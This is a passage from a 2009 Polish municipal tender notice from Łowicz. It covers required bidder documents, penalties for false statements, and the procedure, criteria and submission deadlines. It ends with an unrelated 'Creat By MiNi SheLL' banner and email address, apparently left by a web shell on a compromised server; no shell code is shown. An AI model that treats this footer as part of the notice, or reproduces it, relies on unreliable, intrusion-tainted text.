g) harmonogram rzeczowo-finansowy robót określający zakresy rzeczowe robót (wynikające z kosztorysu  ofertowego), które będą  stanowiły odrębne przedmioty  odbioru  z  podaniem  kwot za ich wykonanie oraz terminów składania faktur,
h) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa wyżej, składa dokumenty lub oświadczenia szczegółowo określone w §2  Rozporządzenia  Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane    (Dz.U. Nr 87, poz.605 i Dz. U. z 2008 r, Nr 188, poz. 1155 ).


Uwaga 6
   Kopie dokumentów winny być poświadczone za zgodność z oryginałem przez  Wykonawcę - zgodnie z formą reprezentacji określoną w rejestrze handlowym, kodeksie cywilnym lub w gminnej ewidencji działalności gospodarczej i opatrzone datą potwierdzenia.

Uwaga 7
   Złożenie przez oferenta fałszywych lub stwierdzających nieprawdę dokumentów jest karalne. Zgodnie z   art. 24 ust. 2 pkt. 2 ustawy wykonawca, który złożył nieprawdziwe informacje mające wpływ na wynik postępowania zostaje wykluczony z postępowania. Gdy fakt podania  nieprawdziwych informacji wyjdzie  na jaw po zawarciu umowy - umowa taka jest  nieważna z mocy prawa.

Uwaga 8
     W przypadku spółki cywilnej lub konsorcjum wymaga się dostarczenia dokumentów wymienionych  w pkt.  a), e) , f),  g),  złożonych przez każdego wspólnika lub  konsorcjanta  z  osobna.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lowicz.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łowiczu, Stary Rynek 1, 99-400 Łowicz, bud B pok. 40.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2009 godzina 09:00, miejsce: Urząd Miejski w Łowiczu, Stary Rynek 1, 99-400 Łowicz, bud A pok. sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com